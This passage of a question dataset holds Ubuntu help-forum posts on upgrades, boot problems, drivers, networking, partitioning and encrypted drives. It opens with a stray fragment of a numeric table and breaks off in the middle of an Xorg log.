5 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0ea 0 dc 0 16 0 r y . 5 6 5 0 . . 0 24 8 0 0 0 0 0 0 none 0x0eb 0 dc 0 16 0 r y . 5 6 5 0 . . 0 24 8 16 16 16 0 0 0 slow 0x0ec 0 dc 0 16 0 r . . 5 6 5 0 . . 0 32 0 0 0 0 0 0 0 none 0x0ed 0 dc 0 16 0 r . . 5 6 5 0 . . 0 32 0 16 16 16 0 0 0 slow 0x0ee 0 dc 0 16 0 r y . 5 6 5 0 . . 0 32 0 0 0 0 0 0 0 none 0x0ef 0 dc 0 16 0 r y . 5 6 5 0 . . 0 32 0 16 16 16 0 0 0 slow 0x0f0 0 dc 0 16 0 r y . 5 6 5 0 . . 0 32 0 0 0 0 0 0 0 none 0x0f1 0 dc 0 16 0 r y . 5 6 5 0 . . 0 32 0 16 16 16 0 0 0 slow
388526	ubuntu 13.04 showing black screen with a cursor and mouse pointer after update	i was trying following command do-release-upgrade -d but the os said there were some failed packages , so i tried : do-release-upgrade -d -- fix missing it might have been sudo apt-get upgrade -- fix missing i am not sure . afterwards it asked me whether i wanted to install a newer version of some packages . i selected no . then on restarting the system ubuntu showed a black screen with a blinking cursor at the top left and a mouse pointer at the center of the screen . the screen seems to be blinking as well . i cant even access the login page . how to resolve this ?
388528	ubuntu is vulnerable to viruses from the internet ?	ubuntu can be affected by visiting websites that google has labeled attack site . ?
388533	what does the down-right arrow button do in raid disks 13.10 ( gnome-disk-utility ) ?	when i open disks ( gnome-disk-utility ) , then highlight a raid , then either click its gear - > raid disks ... or ctrl+r , i get a window with three buttons , + , - , and one with a u-turn like arrow ; what does the one with the arrow do ? there is no hover text , and i 'm not about to click it to find out . here 's a screenshot :
388536	xubuntu internet connection drops	my problem is a little weird . my internet drops when i download too much data . for example when i download large files . if i just brows it will take a couple of hours to drop . when connection drops the icon still shows that i am connected but no website responds and everything times out . i can do ifconfig wlan0 down and then ifconfig wlan0 up and then on my taskbar click wireless icon and reconnect to fix this . ( just reconnecting without ifconfig wo n't help ) but then it will drop sooner than before . if i reboot it will again take a while to disconnect . lcpci for wireless card is as follows : 04:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 73 ) subsystem : intel corporation wireless-n 7260 [ 8086:4262 ] i read many posts about this issue but nothing helped so far . i had the same problem on my previous laptop with ubuntu and that one was way worse and i never managed to fix it . any help will be very much appreciated . edit : i have installed the driver again but not luck . i forgot how to check which driver it is running . lspci -k does not output the driver specs !
388537	built-in display brightness drops to 0 after monitor rearrangment	i have a lenovo ideapad yoga 13 . i use it with an external monitor via hdmi at home and at work . if i re-arrange the monitors in the display settings ( which is to the left/right ) at home my laptop screen ( build-in monitor ) goes black . turns out the backlight brightness gets set to 0 . i can just increase the brightness using the hardware button , but this is still super annoying . any idea know how to fix this permanent so it leaves the brightness at the same level it was at before re-arrange ? note , i had to follow this to get the brightness keys working in the first place : brightness 0 % on lenovo g500s on startup / boot thanks !
388538	how do i upgrade ubuntu from 12.04 to 13.10 ?	i have been thinking about upgrading to 13.10 , the current release of ubuntu . i am running 12.04 lts . i was wondering how i would do this without having to back everything up , or do i need to back everything up ? thank you !
388539	using preseed for automatic installation of ubuntu	i 'm a new user to ubuntu and is very interested in learning more about the system . i 'm currently researching about how to install ubuntu automatically and found websites that provided tutorials in doing so . with my very , very limited knowledge of the system i 'm still confused about the different ways to create a preseed file . what i did first is downloaded the 32bit ubuntu 12.04 lts iso and created a live usb with it using unetbootin , pendrive , and liveusbcreator . there 's a preseed folder that contains ubuntu.seed , is that where i put the edited text found on https : //help.ubuntu.com/10.04/installation-guide/example-preseed.txt ?
388540	encountered a section with no package : header	i am trying to install java on my ubuntu 13.10 ,64 bit.i am getting merge-list problem again and again.as suggested in many forums i have tried - sudo rm /var/lib/apt/lists/* sudo apt-get update but it 's still giving the same error - e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en % 5fin e : the package lists or status file could not be parsed or opened . please , suggest me some way to get out of these errors . edit : the output for grep -v ' # ' /etc/apt/sources.list is deb http+ : //in.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http+ : //in.archive.ubuntu.com/ubuntu/ saucy main restricted deb http : +//in.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src http : +//in.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb http : +//in.archive.ubuntu.com/ubuntu/ saucy universe deb-src http : +//in.archive.ubuntu.com/ubuntu/ saucy universe deb http : +//in.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src http : +//in.archive.ubuntu.com/ubuntu/ saucy-updates universe deb http : +//in.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src http : +//in.archive.ubuntu.com/ubuntu/ saucy multiverse deb http : +//in.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src http : +//in.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb http : +//in.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : +//in.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : +//security.ubuntu.com/ubuntu saucy-security main restricted deb-src http : +//security.ubuntu.com/ubuntu saucy-security main restricted deb http : +//security.ubuntu.com/ubuntu saucy-security universe deb-src http : +//security.ubuntu.com/ubuntu saucy-security universe deb http : +//security.ubuntu.com/ubuntu saucy-security multiverse deb-src http : +//security.ubuntu.com/ubuntu saucy-security multiverse deb http : +//extras.ubuntu.com/ubuntu saucy main deb-src http : +//extras.ubuntu.com/ubuntu saucy main`
388541	`` e : unable to locate package update '' when i try to update my system , why ?	i have almost an hour trying to update my installation , this is how i 'm trying to do it : $ sudo apt-get install update [ sudo ] password for braiam : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package update it just does n't work ! is n't install update the text i should put after sudo apt-get to install updates on my ubuntu system ? if not , what command should i write ? this question is trying to address some common mistakes by users not used to the apt system and apt-get .
388543	what is the power consumption difference between gui and shell ?	i was wondering if there is any difference in power consumption between regular graphic interface mode and command line shell mode . and if it is what is the difference ? could i use ubuntu on the battery longer in shell then gui ?
388546	how do i unmute the sound ?	my sound stopped working an i do n't know why . the gui and the terminal are telling me different things . the top bar shows the speaker symbol with three dashes . it looks muted . it used to show a volume slider when i clicked on it , but now all i get is a small gray rectangle . the print screen button stops working when it is visible , so i ca n't capture it . in the terminal , amixer says the master volume is unmuted and 100 % . $ amixer get master simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 64 mono : playback 64 [ 100 % ] [ 0.00db ] [ on ] the terminal is misleading ; the gui is being downright weird . how do i get the sound back ?
388547	is creating a bootable usb drive permanent ?	more specifically , i want to know if when i put the ubuntu os on my flash drive if it is permanent or not . as in , can i delete the ubuntu installation files after i install it on my computer and use it as a regular usb again ? i just want to install ubuntu on a unformatted hard drive and then be able to use my usb like normal again . sorry , i know i must sound very redundant . thank you for the help .
388559	wireless drops out on realtek rtl8111/8168/8411 ( rev 01 ) with a mini 300m usb wifi wireless lan 802.11 n/g/b adapter	basically when i use internet it is fine , however if i stop actively browsing or downloading my connection drops out . i still have the connection to the router but no internet . other devices can still connect to that router and get internet . anyone has any idea what this is ?
388562	rosewill wireless pcie card is not being recognized	i have the rosewill n600pce wireless card on ubuntu 13.10 . i have been unable to install drivers for linux or for windows using ndiswrapper . i had to attempt to extract the drivers from www.rosewill.com . i was unable to extract .inf files from the windows .exe s. i also got similar drivers that had inf files from : www.asus.com . these drivers failed to install because ndiswrapper said fatal : module ndiswrapper not found i do n't know why it said this , i have it installed from the software center . i have looked around the internet and i was still unable to find a working answer . does anyone know what i should do ?
388570	how do i route the output of a single program to a mic input ?	first , some context : i 'm a part of a tf2 server that includes lots of micspam . i 'm in the process of writing a guide on how to do this properly- namely using a media player and some form of audio pipe . on windows , we achieved this by using virtual audio cable or vb-cable . i really have n't found any sort of equivalent on ubuntu , at least none that worked for me . for this , i want to know if there 's some way to take audio from a single program , such as banshee , and route the sound output into a mic input . ideally , i 'd like to be able to do this without changing sound servers . thanks in advance !
388571	i have a windows 8.1 and i would like to know how to install ubuntu 13.10 on it ? i have tried numerous times with no success	i have a windows 8.1 and i would like to know how to install ubuntu 13.10 on it ? i have tried numerous times with no success . and can you please explain it in the simplest terms .
388576	using startup disk creator in ubuntu to create a windows bootable usb	i 'm trying to install windows on another computer . i have ubuntu 13.10 on my computer . i downloaded the iso and have it on my computer ( which has ubuntu 13.10 ) . the file is named w8.iso . i 've tried using the startup disk creator , but the iso doesnât show up in the select box ( even after i click other . . . it does nothing ) . i would appreciate any help . my usb stick is in slot sdd , and my iso ( named w8.iso ) is in my downloads folder .
388578	i am having trouble with my sound driver	i am running ubuntu 13.10 with windows 7 . from yesterday onwards the sound driver is having trouble , using the solution in this page http : //itsfoss.com/fix-sound-ubuntu-1304-quick-tip/ i was able to restore the sound but there is no icons on the unity panel , no label in the sound setting please help
388579	update to 13.10 failed via update manager	update to 13.10 failed via update manager , the failure information as below : w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead .
388582	partitioning for 3 operating systems	i am getting a new computer and i want to set it up with windows 8 ( i 'd prefer 7 but it comes with 8 , ) ubuntu , and arch . how would you recommend partitioning a 1 tb hard drive . i would use windows for games only , and ubuntu while i 'm figuring arch out , and that later moving to arch as my primary os . i would like to have a shared partition between arch , and ubuntu for files i would want on both , but that is not necessary . thank you for any help . ( if it 's of any help it 's a 1 tb drive 5400 rpm , with 8 gb of ram , and an intel i7 processor )
388583	shutting down problem	i'á¸ż using ubuntu 12.10 on my hp elitebook 8460p laptop . i had a problem shutting down my system . when i click on shut down a black screen with white letters appears .
388586	split up the non bootable partition and install ubuntu in any .	i 'm trying to partition part of my hard drive that 's non bootable and install another version of ubuntu on the part of the disk with free space . can anyone point me in the direction of information on how to do so ?
388587	voice changer application that can work with google voice on ubuntu ?	is there a voice changer application that can work with google voice on ubuntu ? i.e. , it can modify the voice coming into the microphone and send the modified voice to the other side of google voice call . how about for skype ? thanks !
388593	setup jdk for android studio	i was setting up android studio and got this so i followed the answer here and used sudo update-alternatives -- set java /usr/local/java/jdk1.7.0_17/jre/bin/java sudo update-alternatives -- set javaws /usr/local/java/jdk1.7.0_17/jre/bin/javaws but this gave me update-alternatives : error : alternative /usr/local/java/jdk1.7.0_17/jre/bin/java for java not registered ; not setting how can i fix this and get android studio working ? i am have openjdk installed .
388597	graphics driver issue on inspiron mini 10 - dell	i 'm trying to install ubuntu 12.04 lts on a dell inspiron mini 10 and although the live cd worked fine , now i 've installed it , the graphics driver appears to be having some serious issues . i 'm not the best at ubuntu or linux , so clear advice how i can find and install a working driver would be great . many thanks .
388600	how can i check whether live ubuntu 12.04 lts cd is having defects or not ?	when i burned ubuntu 12.04 lts cd , i did n't check md5sum of iso file before it . i checked option check for defects and it ran perfectly . i doubt that iso may be corrupted ( viruses , unofficial moded software etc ) . how can i check whether live ubuntu 12.04 lts cd is having defects or not ?
388602	copy ubuntu 12.04 from one computer to another	i 'm a newby to ubuntu 12.04 . how can i reinstall ( boot-up on other new computer through usb ) the current installed ubuntu 12.04 ! with all ! its directories and installed programs ? put it in another words - does the start-up-creator gets into the iso boot-able file all the current-user-data / info / programs ? thanks in advance , jacob .
388603	need help creating a share folder in ubuntu 12.04 desktop	i 'm a new linux user . i want to create two sharing folders in my ubuntu 12.04 desktop . one should be network password protected , another one should be non-password protected . help with screenshots and videos would be useful..
388604	socket program did n't recognize client connections	i 'm coding a socket program in c++ on ubuntu server . it will grab packet from client , process , and send back new packet ( both via port 23101 ) . it works fine when i tested on local computer , but it does n't recognize any new connections from client when it 's on the server . when i use command netstat -a the result is shown below . proto recv-q send-q local address foreign address state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- tcp 80 0 serverip:23101 clientip:11211 established the client successfully connected into the server and the server got a packet from client , then do nothing . how to make the server send those packets to my program ? or let my program directly accept the connections from client ?
388605	lenovo x220 tablet 多como habilitar el stylus ?	hi i have a lenovo x220t tablet pc , which has 2-point multitouch and touch wacom stylus input . i recognize that one with multitouch , but the stylus does not work . i have installed ubuntu 13.10 and recently renewed the truth is that i 'm starting to delve into the world of linux and not take it at all well with the terminal . if any of you could guide me through the steps i have to do to activate the stylus would be very grateful .
388609	having trouble repairing window xp that is dual-booted with ubuntu 12.10	i had been successfully using windows xp dual-booted with ubuntu , for over 2 years . then , out of the blue , something happened to the windows boot file that made it impossible for me to get into windows . a message appeared that said something to the effect that the boot file may be corrupted ... i 've tried to use an xp disc to apply the recovery mode , or even a re-install if it came to that , but the disc informs me that no windows program can be detected . and i 'm apparently not allowed to proceed further . my ubuntu partition works fine , as always . any suggestions for fixing this thing would be enormously appreciated !
388611	how do i create public html folder ?	i am a php programmer and new in ubuntu . now i am using ubuntu 12.4 i need to create public html directory on my home directory for easy assess of php files . how can i create this public_html directory on my home folder . and how it configure as a apache server for run php scripts ?
388612	unable to locate package chntpw	to overwrite a windows 7 password , one can boot from a ubuntu livecd and run chntpw . unfortunately , installing chntpw is not so easy : $ sudo apt-get install chntpw e : unable to locate package chntpw
388615	can i run ubuntu ?	my system specifications are as follows : 1 gb ram intel core 2 duo processors , 1.80 ghz 100 gb hard disk 32 bit ati radeon graphics card . with the above requirements is it possible to run ubuntu in my laptop , currently it is running windows vista . if yes , then please specify which version of ubuntu ? thank you .
388616	windows boot loader recover	i got this weird problem by my own mistake . i first updated windows to 8.1 and ubuntu does not load . so i tried easybcd to repair it . it does not work since the computer boots with uefi which i realized later . then i tried to delete the ubuntu options that does not work ( it show windows can not load since some files required is missing ) . but instead i deleted windows 8 boot loader by mistake in easybcd , leaving the ubuntu option there . now i recovered ubuntu and tried the boot repair and refind . either one can not fix it . i have the boot windows option , but it has only the ubuntu booting option created by easybcd that does not work . any idea how to fix it ?
388620	ubuntu installation unsuccessful in windows 8	i installed ubuntu from usb flash drive . i partitioned drives for swap , ram and home directories . i also partitioned 700 mb separate space for device bootloader . when nearing installation , i got an error saying `` device boot loader can not be used and asked me to use a different one . after i selected that got message saying installation is successful . but , after restarting my computer i do n't see a prompt to choose between ubuntu and windows . i do not see that in my control panel either . ps : the iso installer in my usb drive was no more but , i saw files unpacked . any help ? thanks , santhosh
388632	using the mkfs.ext 4 command with -c switch	i am currently using ubuntu from a live usb and in gparted can see that my internal hdd has 1 partition /dev/sda1 size : 931.51 gb , file system unknown.. i want to prepare this hard drive to install ubuntu onto , but the disk utility tells me there are 798 bad sectors ( which from doing a bit of research is approximately 0.00004 % ) . doing some reading in other forums , apparently running mkfs.ext4 -c /dev/sda1 will create file system to which i can install ubuntu and avoid the bad blocks in doing so . i really have no clue about this sort of thing , so just want to know if this will work or if it is the right way to go about it at least . the reason i ask is because it is going to be a very time consuming process , as after 1h 35 mins it is only 0.08 % done.. i am a complete linux n00b so please be as straightforward as possible in your responses , and thanks in advance for your help !
388633	ubuntu 12.04 installation failed	i already have installed windows 7 . i am trying to install the ubuntu 12.04 from usb but its failing . i saw the logs and got the following error . starting load fallback graphics devices failed . i also checked my driver and it is . standard vga graphics card and also installed the latest vga driver . how to resolve this ?
388635	asus v551l wo n't boot from live cd	recently i installed ubuntu 13.10 on my asus l551m machine , and i did some tinkering around with it , and broke something somewhere along the way . since breaking the machine i 've tried multiple tricks to 'autoremove ' some stuff , but this issue began with my trying to burn backtrack 5 r 3 onto a dvd . i ca n't exactly remember the name of the burner as it was one i had recently found and decided to give a try . i 've attempted reinstalling my nouveau drivers thinking that could 've been part of the issue as having attempted installing nvidia-common and even the 319 drivers caused it to loop at the login splash screen . much to my avail none of those worked , i even attempted the 'chum ' fix and still got nothing , i 'd gladly offer some console read-outs only i ca n't get into my system to attempt such a thing . another issue i 'm having is trying to run the live cd again to attempt a new install of ubuntu 13.10 , as with any other bootable medium , none of them load . fortunately , i can still get into the cntrl+alt+f1 at this point i 'm at a complete loss as to fix this , any help would be greatly appreciated . by the way , i did attempt to fix this issue with the help of asus tech support , they did help me change my boot setup to boot from these mediums , but even clicking to boot from one other than the hard drive causes the system to boot straight into ubuntu . it wo n't even boot a windows disk . thanks in advance for the help .
388636	access an encrypted drive from one to the other installation results in no key available with this passphrase ''	had a desktop and a laptop , both running ubuntu 13.10 . decided to merge the two and plugged in laptop hd in tower 's second slot . both are seperately encrypted . have no trouble booting one or the other , but for the life of me i ca n't access either from within the other while booted . i 'm prompted for passcode ( other hd shows up in mounting space in computer files , unmounted ) when i select it , but either recieve a general error message ( when using incorrect passcode ) or this specific error using correct passcode : error unlocking /dev/sdb5 : command-line 'cryptsetup luksopen `` /dev/sdb5 '' `` luks-793cd2e3-73b4-art7-25fe1e2b04d4 '' ' exited with non-zero exit status 2 : no key available with this passphrase . i suppose i could start from scratch , wipe the drive and add it under the tower 's drive , but i 'm pretty sure that is n't the only solution .
388637	empathy : jabber account keeps ketting disabled	i 'm running ubuntu gnome 13.10 which means i do n't use the central online accounts manager which is in standard ubuntu and i have the im accounts set directly in empathy . i have two accounts - a google one ( gtalk/hangouts ) and a normal jabber accounts . the problem i have is that after turning my computer on or rebooting it the jabber account is disabled and i have to manually enable it again . the jabber account itself works like a charm , there is no connection issue other than the need to re-enable it ( almost ) every time i start/reboot . does anyone know what could be the issue ?
388638	concatenation in shell scripting bash	i wan na check if 2 lines have equal $ 4 my shell must check if the diffrence between $ 3 in line 2 and $ 2 in line 3 is equal 1 it must concatenate both line into one like this 1 ; 1000000000 ; 1099999999 ; 2 2 ; 1100000000 ; 1199999999 ; 3 3 ; 1200000000 ; 1200004444 ; 3 output 1 ; 1000000000 ; 1099999999 ; 2 2 ; 1100000000 ; 1200004444 ; 3 i dont know even to use awk or something else
388639	server & desktop installation	is it possible to install ubuntu server and ubuntu desktop on one hard drive ? i ask because i tried installing ubuntu 13.04 desktop on my profile 6 and ubuntu server on my drive but , it replaced my desktop . is it possible ?
388645	why do i have two versions of python ?	i am very new to ubuntu . if i use idle i am using python 3.3.2+ , whereas if i go the terminal and type python -- version it says i am using 2.7.5+ . as these versions are not compatible with each other , i can not run code created in idle from the terminal . so how do i make sure that i am only using one version of python in ubuntu .
388648	knotes note location	i use knotes to writes notes and then i like to put all those notes on my desktop but the problem is : everytime i reboot my ubuntu the location of notes stored on desktops changes and the note is shifted to places like behind the dock or half part on the edge of desktop etc.. hence everytime i log on to ubuntu i have to reset the position of the notes . why is this happening and how should i stop this strange behaviour of notes ? i have tried reinstalling knotes but it does n't help ! thanks you in advanced !
388649	nvidia dual monitor settings reset on boot	i know this has been asked a thousand times , but none of the solutions here have worked for me . i 'm using xubuntu 12.04 . i have an nvidia geforce gt 630 card , using 2 identical monitors - one on the vga port , one on the dvi . every time i reboot i have to switch the side that the monitor is set up on . i 've tried : running sudo /usr/bin/nvidia-settings as root and savings the settings to /etc/x11/xorg.conf copying the produced xorg.conf file to /usr/share/x11/xorg.conf.d/xorg.conf anyone got any other suggestions ?
388651	cpu load not distributed over cores	under heavy task it seems the cpu load is not spread accross all available cores and fan is triggered wile i am waiting for the opăšration to perform ... looking at the cpu monitor one cpu is 100 % when the other ones are idle . i have an i7 with 8 cores with ubuntu 13.10 and it 's bugging me to have to wait when i know there is 8 times more power available . i can reproduce this by opening one large ( 70m ) file with gedit , but this happens in various circonstances . anything i can do about this ? cheers !
388652	does terminal have quickedit mode ?	i like the quickedit mode in windows cmd . it is convinient to copy and paste . so i am searching a way to make it done in ubuntu terminal . quickedit mode in windows cmd : make selection in terminal using the cursor copy by right click selection paste by right click
388654	ca n't install lamp-server^ after upgrading from 13.04 to 13.10	i installed 13.04 because installing with 13.10 directly would n't work in uefi mode . when i sudo apt-get install lamp-server^ it fails with : the following packages have unmet dependencies : apache2 : conflicts : apache2.2-common but 2.2.22-6ubuntu5.1 is to be installed apache2-bin : conflicts : apache2.2-common but 2.2.22-6ubuntu5.1 is to be installed apache2-data : conflicts : apache2.2-common but 2.2.22-6ubuntu5.1 is to be installed apache2.2-common : depends : apache2.2-bin ( = 2.2.22-6ubuntu5.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . how can this be fixed so that i can install lamp ?
388657	working with filezilla on linux server as local site in ubuntu	i am trying to connect my local linuxserver as a local site url as \linuxserver\www in brief , i am using ubuntu as a local server and client as well clients need to upload file from local client to server in that case we are plan to use filezilla but in that local server can not be connected i do n't no why is there is any way to upload local file to server . i have tried following in the local site url \linuxserver \194.xxx.xxx.xxx explain me if there is any way with my ubuntu server where filezilla has installed .
388659	music and videos from ubuntu 13.10 to wp8 ( nokia lumia 920 )	how can i transfer music and videos from ubuntu 13.10 to nokia lumia 920 ? ? ? i 've tried just copying the files like if it is a flash drive and it did n't work ( i 've copied the files but phone never recognised them ) ... i 've also tried syncing it with clementine and rhythmbox and that did n't work either . tnx in advance ...
388661	resize file browser bar in gedit	i use file browser panel plugin in g edit . i can increase the size of file browser bar . but the minimum width of file browser bar is about 30 % of screen width . how to decrease minimum width of the file browser bar in g edit ? edit : when i open gedit using terminal then i can be decrease the size of the file browser bar . but when i open gedit ( without using terminal ) i ca n't be decrease the size of the file browser bar .
388669	ubuntu - every time new instance	i want to have clean ubuntu every time i turn on my netbook . how to do this ? i was using live iso ( from usb ) but it 's very slow . i want to have no data on my computer every time when i turn it on , no browser cookies , no music , no downloads etc .
388672	what is the difference between gnome , xfce , lxde & kde ?	i want to know the difference between gnome , xfce , lxde & kde ? why there are so many versions of desktop for linux ? & is apple mac based on gnome ?
388677	computer boots only to grub rescue mode	i set up a dual boot with windows 8 and ubuntu . i uninstalled ubuntu , but my pc ca n't boot windows 8 . instead i get an error message that says : error : no such partition grub rescue > there are solutions on the web , but my problem is critical . because in my bios settings , usb and dvd rom boots under hard disk boot selection , so i can not boot dvd and usb drivers . also i can not enter the bios by pressing the f2 key ( or fn + f2 , etc. ) . my computer only starts in rescue mode .
388679	upgrade ububtu 12.04 x86 to x64 on a luks encrypted harddisk	i want to install ubuntu x64 without having to back-up everything to an external drive . what would be the necessary steps to mount the encrypted hard-disk during the installation ? the rest should be a normal installation , i guess . fdisk -l output disk /dev/sda : 8004 mb , 8004304896 bytes 255 heads , 63 sectors/track , 973 cylinders , total 15633408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 * 32 15633407 7816688 7 hpfs/ntfs/exfat disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00029535 device boot start end blocks id system /dev/sdb1 * 2048 976895 487424 83 linux /dev/sdb2 978942 625141759 312081409 5 extended /dev/sdb5 978944 625141759 312081408 83 linux disk /dev/sdc : 8004 mb , 8004304896 bytes 255 heads , 63 sectors/track , 973 cylinders , total 15633408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 32 15633407 7816688 b w95 fat32 disk /dev/mapper/sda5_crypt : 319.6 gb , 319569264640 bytes 255 heads , 63 sectors/track , 38852 cylinders , total 624158720 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/sda5_crypt does n't contain a valid partition table disk /dev/mapper/et420vg-lvswap : 511 mb , 511705088 bytes 255 heads , 63 sectors/track , 62 cylinders , total 999424 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/et420vg-lvswap does n't contain a valid partition table disk /dev/mapper/et420vg-lvroot : 25.0 gb , 24998051840 bytes 255 heads , 63 sectors/track , 3039 cylinders , total 48824320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/et420vg-lvroot does n't contain a valid partition table disk /dev/mapper/et420vg-lvhome : 294.1 gb , 294058459136 bytes 255 heads , 63 sectors/track , 35750 cylinders , total 574332928 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/et420vg-lvhome does n't contain a valid partition table lvdisplay output -- - logical volume -- - lv name /dev/et420vg/lvswap vg name et420vg lv uuid 51phec-ylbq-x9fp-nbfz-c7hm-llcw-or39he lv write access read/write lv status available # open 2 lv size 488.00 mib current le 122 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv name /dev/et420vg/lvroot vg name et420vg lv uuid a2ohht-79qg-ijfk-n91j-5psk-toot-ga9tbb lv write access read/write lv status available # open 1 lv size 23.28 gib current le 5960 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:2 -- - logical volume -- - lv name /dev/et420vg/lvhome vg name et420vg lv uuid u3nyc5-hbup-4vah-toxz-ws5w-go0p-40rcxi lv write access read/write lv status available # open 1 lv size 273.86 gib current le 70109 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:3
388688	printing on all areas of a page	i 'm using xubuntu 13.10 . what i 'm trying to do is simple and maybe there 's a simple answer that i 've overlooked , i 'm trying to print out ascii art using the full area of a page . after tangling for days with the absolutely oweful abiword i realised the problem has something to do with the printers i use , canon ip4300 and ip5200 . they leave three thin blank borders on the top , right and left and one thick border at the bottom . you can see text has been cut off . after getting anywhere with abiword , i tried to work on it as a pdf , but again to no avail . i 've messed with the printers themselves , changing things like : expand ( to use maximum page area ) , borderless ( chose both yes and no ) , changed the margins in job options to 0 , even something like media-bottom-margin in job options ( i have no idea , but help is thin on the ground ) i have absolutely no idea what i 'm doing wrong , but the printer refuses to print anywhere it has decided margins are , despite there being none when i click on the printers properties . how can i overcome this ?
388691	hp tx2 1300et how to activete multitouch gestures	i am using ubuntu at my hp tx2 1300et laptop . the touch screen working well . but multitouch does not work . i try utouch and ginn but could not success . how can i activete multitouch screen and gestures . thank you so much .
388692	static ip on vbox bridged network for ubuntu ( guest ) on ubuntu ( host )	network connection error & ca n't browse internet , how do i troubleshoot the network connection ? i want to set a static ip for vbox guest ubuntu 12.04 machine on bridged network host is ubuntu 12.04. steps i did : on vbox , i enabled bridged network & in ubuntu host 's network interface i added a new wired connection with following info : ip : 192.168.8.8 netmask : 255.255.255.0 gateway/dns:192.168.1.1 in my host cat /etc/network/interfaces ( i did a gedit to append the static ip info ) auto lo iface lo inet loopback iface eth0 inet static address 192.168.8.8 netmask 255.255.255.0 gateway 192.168.1.1 in my guest cat /etc/network/interfaces auto lo iface lo inet loopback
388696	evdev error opening gtco device	i 've got an einstruction electronic whiteboard which is handled by the gtco kernel module . the event layer looks sane enough to me . out of the box , x.org did n't use that device , so i added the following /etc/x11/xorg.conf.d/gtco.conf : section `` inputclass '' identifier `` einstruction board '' matchusbid `` 078c:0401 '' driver `` evdev '' endsection with this config in place , the xorg.log reads : ( ii ) config/udev : adding input device gtco_calcomp ( /dev/input/event6 ) ( ** ) gtco_calcomp : applying inputclass `` einstruction board '' ( ii ) using input driver 'evdev ' for 'gtco_calcomp' ( ** ) gtco_calcomp : always reports core events ( ** ) evdev : gtco_calcomp : device : `` /dev/input/event6 '' ( -- ) evdev : gtco_calcomp : vendor 0x78c product 0x401 ( -- ) evdev : gtco_calcomp : found absolute axes ( -- ) evdev : gtco_calcomp : found x and y absolute axes ( -- ) evdev : gtco_calcomp : found absolute touchscreen ( ii ) evdev : gtco_calcomp : configuring as touchscreen ( ** ) evdev : gtco_calcomp : yaxismapping : buttons 4 and 5 ( ** ) evdev : gtco_calcomp : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:12.0/usb6/6-2/6-2:1.0/input/input6/event6 '' ( ii ) xinput : adding extended input device `` gtco_calcomp '' ( type : touchscreen , id 10 ) ( ii ) evdev : gtco_calcomp : initialized for absolute axes . ( ** ) gtco_calcomp : ( accel ) keeping acceleration scheme 1 ( ** ) gtco_calcomp : ( accel ) acceleration profile 0 ( ** ) gtco_calcomp : ( accel ) acceleration factor : 2.000 ( ** ) gtco_calcomp : ( accel ) acceleration threshold : 4 ( ii ) config/udev : adding input device gtco_calcomp ( /dev/input/js0 ) ( ** ) gtco_calcomp : applying inputclass `` einstruction board '' ( ii ) using input driver 'evdev ' for 'gtco_calcomp' ( ** ) gtco_calcomp : always reports core events ( ** ) evdev : gtco_calcomp : device : `` /dev/input/js0 '' ( ee ) gtco_calcomp : could n't open mtdev device ( ee ) evdev : gtco_calcomp : ioctl eviocgid failed : bad file descriptor ( ee ) preinit returned 8 for `` gtco_calcomp '' ( 